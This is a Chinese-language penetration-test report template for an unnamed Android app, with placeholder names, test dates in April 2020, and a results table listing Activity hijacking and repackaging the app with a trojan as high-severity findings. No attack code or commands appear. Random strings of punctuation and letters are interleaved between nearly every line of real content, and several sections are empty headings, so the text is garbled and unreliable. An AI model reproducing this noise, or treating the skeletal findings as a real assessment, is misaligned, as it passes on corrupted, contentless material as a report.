0 v+ n2 i5 L% |: ]7 C, x' |+ U* E+ M0 |/ G( Q
2 |8 ~$ u" U1 V6 W$ r# I6 _+ C/ K2 K: }3 Z2 P
+ ^$ L+ l) i. Y. `" [+ a6 K
; \* ^4 D8 Q4 j1 Q- }$ a& Y7 e
6 z% b2 \) A' I" S* c3 Z) ?9 I) v) e4 m
: m* N" i* X$ M1 N* i5 o! q6 A4 r! S
1 }* D( s. A. S7 g: Z: D
' F/ T% |0 I. h) s2 N
文档编号: 2 l: u9 V, b/ I5 P& L
8 \, ]8 j+ N _& ?
1 L3 C# W8 N1 X4 j( r- u
. w% p% o) _7 a * O% P, n, F- i( K4 d
/ V' a$ }1 A, |2 X3 g6 g
$ t! |% m+ N7 {9 N" m! J
* |; t/ {3 W4 d% m/ a# D8 s Q) E
3 Y! Z% [7 D* c. @
: f: k1 T6 O4 n; I5 B/ f7 }' W
( D. Y% `; ]; d a3 T
/ D4 b9 \( Q9 U
5 w6 @ z0 {+ j8 i. E/ G+ g4 E! S& z0 v, Z, |% a; H
; U1 _# j/ A" g3 e5 ^( b. h
9 f3 \; P* z$ G; O
" L0 o/ i2 u% N# J5 [0 T1 x) H% n ~( B+ P2 a7 Z& J
' h, |% c0 E+ \. |( J1 J& Y
3 m$ c: q4 k& L, w$ |0 [
; j' q" K* W* @9 S* j* n! | r; w
- v- M1 x; b, R2 ^9 h! u* M! ]
8 j6 L3 w& o2 w1 p- s; I# ^2 d3 t% {( A- c1 X
' W9 R7 v- m% q0 V- i
4 B8 `! Q* {# L4 g
! I: t/ [ V: m2 ]4 A- d9 M
1 s" [ h$ z0 S9 K7 R" H
" s$ `7 ~/ F( A6 I! Q4 ?8 G) m
( |% l) e0 O2 A. I9 Q
8 I' j' U4 |+ ]6 K0 t. c
7 a$ _6 U# T g u S( b3 g% `
4 [( \* {" Y3 I* ^" ~5 |. D) n a# W f$ H
* J0 G# V/ X( H, n- n0 z! D" S* `; |$ L7 B8 ?5 p$ J8 ?' R4 x
某某某APP渗透测试
0 _0 d% N' V3 Q/ S! {
9 Z: k+ J. n; \. g5 T9 Q
( c9 X0 F A5 b$ O- I9 Q: F
1 ^9 t' [$ L8 P* O, J1 d
6 ^. n/ x( G4 I* l9 k3 m" U7 U' t' L1 r; X
) M" W% |4 p1 o9 W Q* o) K) b9 S4 d
6 [1 ~: V$ v' {( h- W- D) t& h+ N) _1 u8 J4 r, A
$ e6 `4 Z3 L6 @# s. U9 Z
. l; i' u8 w J$ p; | 7 i+ R0 Y6 V8 y, `8 J$ D
4 {/ c. D H" N! F
! V8 g7 b# X( Y, K' s: F: h0 A$ g! U, A( c
8 ^. o4 y0 p9 ~
. q! K5 B& P! P/ `; `9 s
, y. \+ L p8 L3 {: C2 j6 O; T, M4 |& s& U" q+ J. K
; b8 Z+ S8 ]9 U8 Q
6 G' T# R* J! U( ` , u& O( Y4 ~# @7 @# R8 w5 S
/ j# c7 d x# v! i0 u) ? " |: x8 l/ N0 x0 G5 j
$ K8 r0 X \6 J1 D" P
7 E( v% ?! p0 u) S4 Q
o1 T3 _5 g+ p) q" R+ n% p ! O. v) w$ O- ]
- n- _# b- c: s J( G9 J
技 术 报 告
: u4 X' v, U' x" [; R
0 }; }( W5 Q2 E7 Y; Y; _( g
2 v7 D9 q& I# w# S( a
+ K* f" `) V- b* D , e& Y/ @/ n* ]: p2 R: q: W
* @1 T7 J T3 N- l! T
; }- d" X7 b; e
; L' `0 u0 w+ q2 t. \! O8 ~4 ~
) [; T; k- L z: t( \1 J: d
/ P8 O9 A3 f. e6 ^% M, E, F
( P( ^" o4 o: Y3 s1 m! X. x
+ Y; W( x7 c9 |% j4 C
& J& q# |' E+ h
. G+ [' m0 d1 ^2 [6 j4 ^
" ~- m. M* o/ W3 L3 T, o, h6 B9 v
' K. ]) G2 H+ _% M8 I . _9 V2 `9 S" j6 }0 r) M
7 c/ B+ I' J- {/ C' ?
1 Y$ B3 ]) s+ g" c( T" P7 L, ~' w0 D: o- Y# W& i
6 }8 ~! ~/ ^1 C& K
* g9 ]; _" E% B- ^+ |
! p& i0 M1 a c: [8 e! T# }: U
) p; A: d) {! [' I
3 z1 m6 K2 ~, q3 |5 |8 F4 L1 Q- |1 G+ t$ x
7 @1 w. ]/ ~0 ~# ^0 h2 ^# ?) m- W! m9 h* Q/ u' i5 E2 K! V! O- V$ E! E
3 @6 x0 d: G. b$ O% u
! R7 \- L( N. X3 t9 v4 h + ?( N; m! R, u G7 l) p6 r
' Y( u$ y! z: o; Y9 c
+ J% I! {4 R4 p, V
6 D. S8 ~$ f3 u. n 7 |* V0 {; l: z8 o" p: M
- ^" ]5 H) x! ?6 H
" f* B X" O+ \9 n3 p
/ Z4 X5 T8 r8 p( G$ b8 {
- `% N8 X. c( ]7 K
6 B7 ?' R; k, N) L! O% {7 F
2 n8 v3 N4 i. l1 {: T1 @, K5 j
1 x$ J# k5 G* b9 E
& q2 D* ^6 N& D) }+ K Q
& C& Z, ^3 m' q+ @1 B( \$ H9 \6 O
* W4 Q2 w. K0 w$ ]/ E. W
6 { }2 b& H! X, Y( E1 O+ Y* ?! } * n# u( e: H- c2 Q- b
: w9 x0 c5 ~- j# Z 1 U4 H& P4 r# h: B* ]: w J
i# E7 a! E6 f" R U
8 W8 {4 [; q4 A# V( P
5 `2 V5 W) R. R9 x! @4 X ) L) ~8 U9 [: B, h5 D6 O
( z; I1 v: E2 G7 q: l
h6 g! @+ @& ^- T
( C+ e# S1 _# e( \
! Q' e) f v/ m8 }
* w. U) r5 q) Q% v: }# W# p
" e0 i3 P' V% z( z: k$ p, I1 J: H5 n0 _/ K4 U4 O- u j
) ]" d* Y& U" z+ F1 a
. [( x. e5 X5 @' C/ z6 W9 w
7 B- S* ^/ x/ {% D3 N* S0 F
6 X v9 O# a8 b- u" P/ D' M
1 W3 \0 r h# k9 T
: k B! U1 @9 R$ C9 U+ G6 m' q
, K* ]7 r, C7 ?( P" g9 F; S' `2 u) P
. R9 ~$ p. _4 b5 o9 ?# D+ S8 I
0 N' r; K7 y7 J* H
R Z% z- ]. R& n* _: N
4 q8 S8 i3 ~; T8 r
; t# a* J- N" G# }7 B: q: g. }4 C3 z9 a: K6 B) V
" p1 B& u G( c
9 o/ ]- ~% W* T6 g4 ^: Q4 ~* V0 M5 J
9 w. C6 l4 F" f O) J; w+ T% q- E+ L1 T! ~ Y' z
' f; t* C5 A- v2 v: L6 f
" O" k2 w& y" Q; A# k: v
/ z) E, e- _3 y' c
7 |% N( l$ P4 g3 W) q
. x. e$ h( Y, v& N; p( w$ Q: v/ K3 O: }/ e# ^$ J& h" T2 A
# l" a! J/ F! j" s( L7 `% x
: D% Q" l/ \, O
! N/ s7 s6 }# x2 D0 C. r' Y$ | \
8 y& e$ y, h3 O6 Q% @9 a; B Y2 j0 `, S" c4 d* i7 R
' A' v6 j% L' I/ ]% T
; s. Q4 \3 q- h; r6 F; h4 E0 b, F
$ D0 q, s/ _1 \0 h. S" L
2 Q( [" q) o! e* A3 ?4 J
1 z# d1 {) u& h. G- C) I) G+ q- u& Q3 A; `# x4 D7 T9 x. C
- i$ v, g7 Y3 ^9 Q& x" l* ~
4 T0 Z+ a6 @; |: g
$ k- \. c; I8 W& |) P% P) A) s0 y7 g+ S- A' a% N5 O
M/ V% O5 }3 g; G3 d- s8 L
# y' C9 V4 T# K# W* Z) C
0 N0 I" H) G! V- R. ]0 _
# u) f5 ~# }9 D% |2 x
2 a+ `% {+ H7 i
7 h! U- N( a( v9 J8 L+ Z
9 f3 ] z) c$ D! q; [0 \6 r6 U8 p6 [0 t: T b& I
# \+ [7 r$ b$ F/ z: \5 _
/ u& I" |2 p5 x
& _) `5 } ^2 R4 I9 A: V2 o7 c( W; f' y8 k( M" ]/ M
3 J" \1 R# E+ g* Y9 S
3 t5 |2 K# l' l0 f& @ 二〇二〇年
9 ~+ Z& H5 r7 {4 o6 Z, p; Q
) z5 z0 d- t$ \3 Q# _
, e6 i; ]$ a6 X! i q
5 e6 ^7 ^* ~! \ d2 J# Z: n2 J
: x: _9 z% V9 }; N; i8 ?
# g U+ l% n, d4 c
4 s& @" `. T1 ?6 o# P0 R3 ~+ P; N+ i, n8 Z. v
a0 S1 V( @+ P( V' t: d. c4 I& U/ \3 D1 _% O0 g' h+ h
) I; {1 n! c6 P* U0 J6 a; W
9 z) H, @9 l9 \) J D- V; H7 Q
8 M9 m4 ^1 f/ w/ b
0 c9 F6 }4 _6 q9 X0 W6 _) v- ]
4 U3 j' A7 T' _: N
0 ?/ I0 J; n: o. q( D
1 V1 t" d" f6 ]9 H/ {6 f0 j
* ]4 U9 z! b* @7 C2 I4 B . d& a& J1 R+ D1 }0 Y1 p! u' H
: q/ W+ S7 G( o7 k/ T6 d
6 U& q6 {% c/ @# P! u' ]! j
% ?$ \" M3 B% _( {. Z/ J6 ~ 目 录
+ {0 P1 X8 f$ P# O$ ]
" w; k3 q; {' @6 Q: r& L
. y& t0 \( o/ I V5 K5 V5 k6 r/ o3 X' a4 D% r
2 \, G/ N1 i1 M8 W1 M/ R6 M' I
% F" B. q0 T, t) v1 m4 a
. y- x* D' z0 f- f0 u9 h1 p1 w+ I9 v8 [, G2 S% u
" F" L F* ]% L" m% J2 M
& q0 q8 r( t% T% f
8 {6 q7 B5 J+ w$ X4 y" m
: d0 X0 G2 W5 }5 I' r
6 O0 _- M7 j- d: U' j+ H: S
: L9 J& I" L# I' K, x+ b0 F 1 概述... 3
1 v' @( K; Y7 W
- U% C: `* Y, m& |. w5 i
. s) ^! j4 M$ j
+ B+ E$ @5 l0 e3 f3 j; X
- L I$ u- Q- _' t
) }- A: [9 D+ P3 v, g7 F! Q# l4 ] 1.2测试时间... 3
: y3 _0 N& q! u+ G. C1 T
$ ]+ H. ~' P, [3 g( r
4 |/ Y A- v, R4 Q1 A7 n) D! W$ k
( u" ^2 }/ A6 G6 n9 g ' ~; O! P4 P6 H R
e7 A8 F, _, E; \# s) s4 y
1.3测试对象... 3
" V ^1 R7 a& `6 Y, t |
: Z8 T2 x& T a5 N0 X. B. F8 ?
0 d( R) @! J _: s0 o+ s# d& T# V6 Z0 D& [" u! n1 G" N
# N: {# K# S7 f$ q+ |
1 d; Y! n7 @6 Q$ ~5 J/ t 1.4测试结果... 3 - K1 \" s% n% ~2 I; j
" q: d6 h& D9 Q8 P7 m( k
2 [# w2 _- l1 U; }
2 V- b- f; Z& E9 A. s0 `0 \( [& A' O 1 X. L+ n# P1 h! C
3 D. {) D% c! s1 g3 Z4 c- n8 Q 2 检测结果... 4
) v/ \9 i/ c. w
' O$ A6 G! z5 X0 d$ V0 f: P
* C7 K4 g: k4 O. _; Z& c2 ^6 A( S6 U/ O: d" [0 z4 c8 x4 Z
8 `' r: v9 N) c& @4 x. _
$ f5 u) d' L& B3 y
2.1 某某某... 4 - J0 D1 A6 A4 }
% w; ^& S, L5 }
- ~! B5 {5 J: i8 M8 P
; W1 s8 W% d: U$ P
; l1 C! i. W4 Z) ?. |# O/ f1 a$ [, t
4 p% n' i8 i2 y& |- O8 J# T% H! H
2.1.1检测目标... 4
3 A- Z3 b$ S' A& z% l- P
$ S# P5 O/ ? @6 X; L3 C* s
- ^' J6 D; R9 B- F! F: L% Z- ~: [; V
c9 C. A, _* U" ?6 }
# E9 s/ m2 l, ~( Q" G7 U" h
7 L* n; g2 ?: r9 p% t 2.1.2检测结果... 4
" _% e/ `# `! u6 K8 F- y& j- I7 z9 ?9 o7 p
2 K4 J5 j/ e$ @5 ~
" U Z0 z( `! }/ ~" _' i
' }% g! ]) x# |; g& c( ]
# E" E# a5 k/ i/ V 2.1.2.1. 4
9 _ ^; d$ T% W$ v6 E1 R" U+ n: |9 ~& |/ [* [# u
( n, K- P6 N8 Y; {( e/ _. ~0 R" x7 T$ S3 \: z& F* M, i
& c1 v$ d' @5 p8 U+ D2 Z) Y: g7 c8 }' K
2.1.2.2. 6
# z$ F! y u' x
4 D2 L) O8 }0 ^) C4 ^
5 [7 z! M5 F- ?& W
4 h* `! [+ @" a
: L( v7 Q2 A2 Y1 L/ @, w+ P# V9 Z$ {
5 q& R3 c" ^+ k! m+ ~" y; }0 |, B8 v6 j$ c2 G
. G% Y. B" {+ L# Y9 C2 i, R# K' ~
: P& B% R$ c' {/ j1 ~# ]
) C& t; \% C2 [4 B/ X1 i
7 r% v; x. X+ p- n
, W. g' n6 P$ ^/ [3 ^
( Z' t5 a1 W; l8 i* M* g
6 D4 k8 s) R! t9 R8 g& O% p
$ O3 H' c: w' r# s; S, [8 Y
9 w( h. w2 [# d6 P: `' ?$ W
) X1 Q1 k& \/ b& W: R( @, ?$ U# k1 t9 T/ n, L
1 概述
$ S, C8 g( Y9 D/ z* b- E5 l$ } w U" @) x' t. @+ E2 y5 q
+ _& y! O* x; k# U# p X% Z
! z* u5 A# F4 O7 c8 i7 x4 g
+ `. X W- m- n* {( G6 _6 Q2 Q- Y- D% U+ S% w/ ^
1.2测试时间
, j3 Z7 N" A# B4 y x" B* l* _* L
" n6 G7 D5 ~6 ~
; x3 @; w# E, }8 K! p
4 v$ U. q' F' R
1 ]9 e7 H" k$ h A/ _" X* e
0 A$ F v) p0 Q: M1 |5 M ?. ] F
" i" [7 X& \1 r3 `, `6 M$ d% P. B% X9 v* K) o4 q2 o
R# j2 E1 A0 | i, s2 ]4 y9 T: I. \5 \
w6 `) u# \- i + g4 J' m. R9 c$ m( ~4 B
2 j+ d) v" G4 ^2 o- \. n, y
' }( U+ Y) ~& I2 B$ b$ N. ?
: N3 \* G/ z/ Z6 C 渗透测试时间
. D4 z e; N% n+ a" A; k( p8 F; D n* h0 R" a. c- v
, p2 L1 O. f( k* a. h' w% J, e" `' ~" B6 [
|
5 k$ I5 n9 B1 o5 J& t# g( f7 U
8 N4 M. K+ E8 W7 W
4 B% @: Q) {) r! b" N
/ J; s: K6 G; t- t; T
9 I1 {9 [! E7 h$ Y% N. F. w f) z1 R+ H: a/ }
. Q4 s! J( X* P! r1 C; D
' k W5 B% _7 A4 a: s, ?! }
& d% R0 i: S- P$ _
$ U% D5 v4 g# I3 r
起始时间 , q; S" m% \( g# e7 {; _( c% E- C" j
. q( j$ X4 r3 M) ~0 Z
/ Q( \/ M& Z/ |: b+ @2 }4 _! g! Y+ t4 v/ p
| 6 ~ t" }1 B1 m: A9 u
5 i3 L, P5 ]- J/ R
+ i; \! g/ l, @. J5 d+ d! J( `( S
% f f: Z8 R D, m 5 }6 ~1 R# `4 q7 y/ D/ ^) M# {2 X
' ]: v! i; o, x1 x9 ? 2020年4月6日
) ?" m0 [. J- ~# S( N6 O: l& t( p/ M
, s+ N- L" v# W( r9 [
# Y1 P F2 c7 w7 ~2 V( L
|
. K/ F6 u& r- T' M0 Z" c* O/ U) f+ V" n% y; i2 N4 w
4 M0 D: O7 o4 T5 h0 z# j
9 g) H1 ?% k& N* A$ u1 |& _
k! a( O0 t8 Q# A$ y$ j3 n$ l7 P: l- _; I% h
8 I& w& n0 Y4 {# l# X% `
: ?3 F$ g# ^7 e* ~6 G: k6 P8 T 8 ]; @; Y$ L. K* I
8 t+ P1 z' D, j( ~* J+ b5 h
结束时间
9 L0 _8 X T. ~) L0 o0 g( K' S9 d6 `, J6 y3 }5 `, J7 I2 X
" x" g- a* i$ M8 _* A& \/ ^. K+ x. G2 L s
| & G# I9 }1 y$ ^ ^1 b2 ~& A
1 T% l9 s2 C& B6 b6 @2 j F0 }* C1 U6 s$ ?
% L3 p M/ n" Z2 X9 s% v3 s 3 b) Q v% G7 L' L. J$ s2 ^
' u. P) ?: P5 @* ~ 2020年4月9日
. y1 l" ^+ I- v( m8 T& z1 C0 f9 d& p1 o* |% ^3 Z
G# p. v; `" Z+ f$ A E# l, z
) d2 v; x4 W- f0 `; H |
9 a; \, [/ T* j( Q
# N `. w/ Y7 w2 }% X3 o
: r, k' p% {) p3 A- g+ ^
. ]: |3 \0 K9 z* a$ h7 |) P/ d % ~+ d: W3 `9 E* N9 b0 |+ V7 H
! F3 l3 X) A& K4 w8 J
/ }! m/ E- B% r7 W$ s. P; [3 x# ~
7 X/ O! [6 r: R! U
7 K3 r6 Q( m7 C. G1 r- j 1.3测试对象
9 p* U7 \5 [$ C8 U7 g; V% K* `! J1 b9 s
6 N' ? { ], ]( f/ j d1 u! p" H2 ]" ?' y! s* L4 O
, f( v T( m3 l9 Z8 P' u8 [+ F/ g! y Y" G+ k* U
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * V# E1 A. U" ~8 b4 z
6 T+ S) x* ]' V
/ K3 |) A: w$ g# i
' o+ Q" Y! t+ I8 O7 l7 R6 j3 F! u
z( x8 l; d3 q5 _9 x
3 R5 ?& e) K! j6 z8 v9 l
表1-1 检测对象 5 Z; F0 y E$ y
( h$ f7 \3 D" l1 D9 E! l. {
( { H3 x2 I. G. W% ^! }2 o% O: U s/ s R# ~/ Q E. p v' i1 Z
' U: R1 p" Q k0 U# \2 e! F
" S2 L4 [, c$ t- ?5 i" ^( Q & F$ i7 ?& ^( d* ]0 j
. e! j! p c" P. O5 y4 `" I3 b
% b F" P0 V* ^; i6 P, E2 a+ h8 F: L" N4 W1 i
6 Q: T, E+ k+ r" n" z6 E
+ T0 A5 F4 u" \' L( _2 X
3 c# t8 y) I; \7 g5 z8 Y. E8 y* {% j+ j
序号 9 ^7 \8 w$ X& s& z
) a/ Y1 h6 {7 {; W- @, p$ J$ B) ~ 2 @$ G! d6 \2 s! P- v( j7 f5 a
% y- K# ^9 H8 }7 z0 p2 d% h
| # [. D% J$ f1 S1 r
' [0 M, t& r, k4 G8 B- u 9 e* ~4 ]6 w2 Z& t0 Z
- o, o' T1 t( K, ^4 ]6 g
9 c9 u- i$ F* I; U& L4 X: b; o: Q+ [8 S5 ]9 F3 A
测试对象
6 |; C0 |1 x% Y! B$ @; W5 ^0 l! e& i
/ ~( w, K- b! l
( J8 o2 t) g: S' A" a* V* I+ D | ' @7 c- d) I# n- K
1 g. e4 C$ e* H: T$ B . {4 W: t2 @2 }5 q& e7 ?: z' c+ w/ F
, k. C) G) |/ H$ r
( J5 N7 k' L5 ?9 \- P5 d& q
* v" b! m4 w7 U6 U, M) y 测试地址
2 A: m. u2 u( ?+ ~1 x; `. z+ p& V
; }4 R- P1 } r+ i/ D
# [. R, A, g) S% z. y! ]
| * ]1 z% j5 v: Y, |9 g* K
; C2 c3 |/ |6 K# [2 \, G" d c
2 Y( G; K7 w/ J6 F% m. I0 Z" Z& P I% F" d: v
1 ]' j; h; ^7 X. `( ]& p6 U9 V! p: {
安全漏洞
6 O2 V/ B( B l8 g3 j4 e! [
$ G$ j& D2 s* y. i; `5 o9 a x1 ? P3 h# b+ Q) C! s8 J& G
% r8 |5 m6 _8 N# q1 t! g
| 4 D/ ]& o( W: o3 W, Y3 |: f( [
/ `) r7 s4 g9 ~+ ~3 j6 u- c! m
7 J. M5 k) G* l, `6 q
4 P( s+ W% z$ z; w7 p& ?1 ]0 s
0 _* I; x. L- P
4 i3 ~& S) x) }, e! t# g # c9 Y, F, w# M* P8 X) v9 w
: s* W' ~$ Z6 ~5 L
" j* W1 ^+ g* E: Z: l
, E0 _. X6 N" Q 1
$ m0 R- o# q, e! H& W, J8 }4 b/ o* B, p9 _4 F2 X
4 i0 O ~$ X+ g& j5 h
! E9 p$ }$ k5 [+ p( b3 g* W" k |
/ ^) U; n: z+ V( g% @" E5 o6 W! b: S8 m$ T7 M& Q: t
4 ?( `0 y8 N- e; u* q9 }& U9 x5 f: `( B1 @4 u5 j6 D+ a7 N6 D" f* [% q+ X- U7 \+ f
* H: }6 `5 P( x5 V
+ b! Y# c5 c% H: j; J
某某某安卓APP
; o7 S% j, w; Y: ^; N( P$ x7 }' `
( T; l+ r. ~7 h5 Q. w- E
* A: C! f, r: _8 f1 O8 b3 \
- ?. U% ?0 t* r" u | _5 |) i7 @2 R# v
. q u# R! M; ?; B! X
0 H @4 Q: y1 m" U
; _/ g$ P$ g) L
l2 d5 _- M3 [5 {: m
, _7 g! Y0 b6 w0 J' s' t + I9 ]5 M* L* e
) a1 p8 \7 I! f( ]* F& c" j( C
" f* ?3 b- A- n' |* Z
9 f; W; `/ ?/ L9 e5 w- u X1 g | ! u3 M2 k! I; Z: w
. _( v3 K) c6 h; c, x* Z
2 W+ [1 W+ }3 L/ r! Q; Y& y, G' y7 v, P. k/ @
6 R! Q# f- E: P4 O
& T5 f6 U& m2 }" c+ U/ o 2
; \( {5 t4 V* J9 N9 Q: R
# y& _) E9 J; A* ?
: _& y( j# T& C; ^
: C, u* I) r& z* H0 ` |
$ J+ G; P- }4 r4 h: h5 W8 c5 K9 C9 V, Y* y7 Q9 ^$ {! b. [+ n
) ?' }9 H% T8 G E1 M. Q# N! S/ ~/ E" n, @/ R. p" Y
z/ S: C9 r; z) s- V3 ]+ U& a+ L, p+ `# A/ w) q
! N0 {# m! |3 ]& h9 ]/ q6 p5 b( m% O
1 R1 W& {1 M! k- j
" s/ E- r! f# T: K. |$ D 1.4测试结果
! k L& w$ q. v9 m( Y& }7 `2 A! s' F5 E1 i, y
$ h! `3 g* v4 f' T' r
' D! y; Z2 B9 x
$ P, ?8 s2 V9 B/ d7 W
# [1 J3 U* }8 D7 t. U8 v3 U- `& B
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
, o1 m! M/ y* N5 s
# K4 {/ l, i* s: g3 K- t3 b6 d
; t3 w* n; J8 ?; c1 Z, r, w3 F- \5 [0 g; q" F* A
4 Z+ I) j; }7 i! V; D) R; J Z
* u; I# C5 N3 P- w4 d# M6 c
6 D e! k7 J# @* j: y
* o9 ?0 b" }% \9 @" u' |( Z% X
! X4 x6 y$ k* L+ {6 n4 \& p7 `; |2 ?& O3 T5 R& O1 Q
7 V9 i$ a+ C4 m/ F9 S' {- z
! |: I4 c' I- n7 e% M) \ : j! C, J8 { h
2 _, A/ ^/ ~" V, o4 A
* t* E5 D+ e q7 n6 |6 S6 L5 ^9 d/ u& N% z. k% \2 G+ g
; H9 g6 e) T8 w T( V2 b' }% a. y3 Y# f, }$ J
, j$ e4 N K! B; v7 l6 f
% i% o1 ~- H) l& j* k: ~+ L
; ?% y; R+ M& n$ F7 M
0 J* b+ s9 t' E. E( z 序号 5 |% x9 q# s7 I- n, N
- X6 }' A; ?. S; X' I
( f% }% a4 E0 d/ _( C
: Y! b- C% Y: E7 e. R, u9 w | ! z: v7 b5 c; [+ M I7 ~) W W
0 o2 ^. a7 y5 ^6 e I5 z% }4 ~
' E9 a) u/ g3 l# i% F2 N# M R7 w& N+ O
8 P( x, p" `- r- E2 R) [; G
/ f# A _# q! _% _! z( g
系统名称
# | \4 P1 n, Q" k" U. U$ ~
2 e/ w) x. f! ?; e$ } 9 P+ g! [! X+ L% C' H
$ {$ [+ K- M7 [& Z2 z' G
| $ M1 i; c8 x( k) }3 L* F5 _
2 }) H; g) n# T! F4 _
9 R! S1 y+ Q# d5 a5 p
0 ?6 K- M' e S2 L7 s& y
f" R8 P' o/ X7 O
" O' I0 K) B {5 I0 [6 U 漏洞名称 ) l: z: b2 v7 f% i- N
$ X1 U. v. Q% s) m! K# \* o
6 P8 g; d) w& X$ O
9 k! \' k6 w2 {* ?* N2 Z |
$ Y N! |! @+ n$ q5 H! u
/ a- q& D3 c; v4 U4 g' i ' _2 _6 X, \+ V/ f% C, Y' Q
4 O4 ]6 o- P0 x+ d' e* u
+ G( o m# P2 E
& b) O! Z) ?' N+ o( k8 } g+ g% P 漏洞危害 % N9 T6 C7 _" y# g
* Y% V/ Z. v: d% l3 _% J, D4 R- {
' p/ H$ |1 [% P4 P5 O- S: `
) f8 N& Z3 w* ~. t | . m* v) V) J) m
# O6 V2 I' S Y9 K ! q* P) o% s% b" Z- |! X4 R- X
( _9 ?3 w6 ]% Q7 T/ \* C/ N
( O8 J3 p4 G! `5 s' t) _2 l, r/ K, E( K! i& F
修复结果
1 P+ l. K9 w7 X u( ?* }! C
; l7 |6 k4 D; f# c7 C4 c
+ K$ }# z$ q U3 T! o. ^' r5 q. E% t7 J2 y1 m* o8 |
| 3 D7 s) [( L1 n4 V" g' c2 n$ B
6 O4 Z. ~) z9 Z8 M) [2 m6 V
/ _* p' M5 H% [4 c2 k9 n+ ~% m4 U, F/ e
6 n3 j5 L0 v& c3 y: N9 x6 l( D# W+ w: t9 b. M8 K; ^; o+ j
4 S4 y0 \0 f& u( C! S( m. L: Q
* }' n0 @& Y/ O! T+ N' A
2 V! |" w9 s2 [$ z" K0 I1 L* v- i% ]" Q
1 2 Z: {+ m F) l) a' t8 K
) V) C$ B9 F# ^" @# j# l( k
# ?/ \" t8 ?& m; c
1 z& y) L& d/ a4 D | $ O4 Q0 r4 T) t' U2 X$ c$ E
0 m+ h5 N4 [6 q$ A
4 ~$ r2 g$ H, G7 s r: @8 g
; {* G- l% a# a# U ( a1 {5 L8 D4 M8 p
9 H9 E8 ?- g! k6 s
某某某某某某APP
1 I& y1 p+ g. g& Z( W2 p t, X* k4 h- f. H) C
- ~) d0 W( t- a- v
* Z0 O$ Q' y8 q- z) f q( y
| ( T; `7 y' O6 {' z: v
9 O" W; D$ T5 ^ V9 a- U: O 4 _2 K7 B0 ]( ^
* F& u) R& s4 v/ s( X1 _6 R
+ R: F. c* M: h/ w. |( T1 o+ y# @- f$ E+ v$ ?9 R
Activity 劫持 ( g0 t: y g8 Y) E( X5 _
. L. I) S8 y, f' f8 u2 R
8 J# {7 d0 q7 ]: g, B5 w* F7 |6 o* C1 ^* A* c$ i; G; t
0 [8 Q1 ~2 `" P. `. ^
. ~) [8 L2 K: a% ^
, ^* N9 N9 Y3 W2 W7 J6 `
$ D/ Y5 |/ t/ D) f2 C2 i/ ]
3 u4 _9 ^' L5 T' X) z+ A
. K# R/ l& {. t( `: T
|
7 z; @+ X+ n6 t( F0 k( P/ l& k, z& }4 Y. W$ U) ~! ]1 L8 O
1 \" a! m. ]2 t; d7 z; z
3 I0 G# J$ |1 b$ g1 x7 X
^% J: V! p" w6 o! |) }6 w% H( a. f9 ~) g( u E) C
高 J: {7 M4 q7 H2 y* g" R- s
# @$ U* y$ E I Q- z
/ ]$ d. n+ M' f6 v$ @4 r" h0 r$ O, ?& d& I8 D' C
| w' C4 T9 r$ {7 v
4 f1 \% {/ E7 a% r! } {
& _& m, A+ i. p; U5 e( I$ ^' r! d
3 | a5 q' d9 t5 F7 v
8 c& _$ @. X" C
! y2 u/ K+ [9 K. m/ a. m+ A0 X$ o# K1 R8 N) L7 u
0 \0 f b* Q# s; |" `3 u' D4 K5 [
$ W1 H# E' w* X: d4 N' G
| ; w$ U' x- p% j* g
+ ?2 S* D: s) B
: l* ]( O1 R2 ?. H1 ]
' g1 z9 Y: k5 S R
8 {0 F* p7 s6 G4 C
- Y! _0 d; o3 v, r
: ~) D1 z* z7 s( J9 k3 b2 v% z: O! P* o& O! r0 Q% j' i2 E$ @5 b; j
/ ]; J) W/ n9 `0 j5 }' n
( c9 A- c3 G' {5 l3 @; @0 j- Q 2 ! d% N |/ f" Y" G4 C+ Q1 U
" k5 H: o# A) l V5 \5 V% t
: V- G# {: R( d! w9 z2 B2 C; F7 E2 }, d% T3 x
|
. s# y0 e& ^' k5 H) T& }' Z/ [7 \, ~+ E- }
& K3 U& d8 S- L% F
, J v5 e" N6 C2 t$ o
/ Z/ ?, m: K I
& s: N3 N. F& k 某某某某某某APP 4 Y5 _% @1 Z7 y1 i; i
( e& G- p& F& u$ E , b6 A4 q# V2 ?& W" ]# v2 r% k
+ B3 A; I8 l; _6 w, t3 H: T |
4 ]6 v1 l7 U0 k$ v. n7 V$ N) J+ k- \, N4 t. t3 ]
, g7 n$ q# n2 t* W" |, R- @; v. B! E8 s& V
+ e% U2 K$ S% t3 P0 ` ?5 u/ B' O
( J8 B: n6 c9 T 反编译二次打包捆绑木马、篡改APP代码
( B2 o; H2 e8 V! T' K2 d; u" D- l, J4 ^. o( R% k9 Z) ^
! W( F) g8 M) Z3 G* E- |' B
) @0 ?" n/ b! b2 z2 E |
6 s7 ~# Q# p5 m6 M4 o
; d; ^( i, L. g: M7 Q1 A4 _
7 _& z6 p) w8 s; H* i4 O' I& k$ y- K9 T2 w0 P" V
; c9 n* G: B' b3 [/ ^; t
* f6 ^2 t, R# [4 ~) L& b- t 高 3 T4 M1 I |) v0 ^/ `8 x
3 z+ o: e* @$ S/ w, p! M
1 i% R1 b& Y5 q, B; |1 B7 P7 e) L$ l8 L" _8 O( P
|
# M& l, E* I3 ~7 ?! `1 G+ R+ H( G( ]) [/ E+ h* w/ p
! V6 g, p t" F" o" P4 Q$ c
& R5 r3 \; {4 D- _2 h 5 x6 `- Z5 `! H8 [
$ l" t: _8 U8 {; e& O
/ K: K( ~7 }7 U8 `# c' A! q8 x- r4 P0 g( j# V
+ Q" l7 }8 n6 X5 [2 c* o _6 T! i- J4 C8 a4 S4 j" s
| ( f5 c- ^! P" F% E- r
7 h8 y5 i4 ~: C1 ` i/ V. w1 E
1 A7 H J8 r* J2 }" ?, }. u( W% h3 G* ~5 n- t: f
: G, B2 z* J8 N9 u0 L3 f3 z# b
$ [# I6 H% I- T9 U" n9 p
# Q6 A' c" d! e& b: T
7 S! e$ S% M: G$ V
" N, u) r1 _' ?0 H1 p$ y, v
5 N% w: k5 H/ M : g! ]1 `2 [% f" A, C9 P- [8 s
3 c1 N6 }3 ~( H7 P! z4 U) A
5 F8 @( G0 G: } T' \* b+ B+ t
0 d& W' L/ `' g' S
v& R( g% O3 I4 z8 H, ^
+ E2 P \& C5 R7 @ ! W# m i) Q7 z6 n
" v) `8 h9 E% G
表1-2 测试结果 2 T) B# E: l0 N' ]* G
: c: p& l: P; H+ ] N6 \
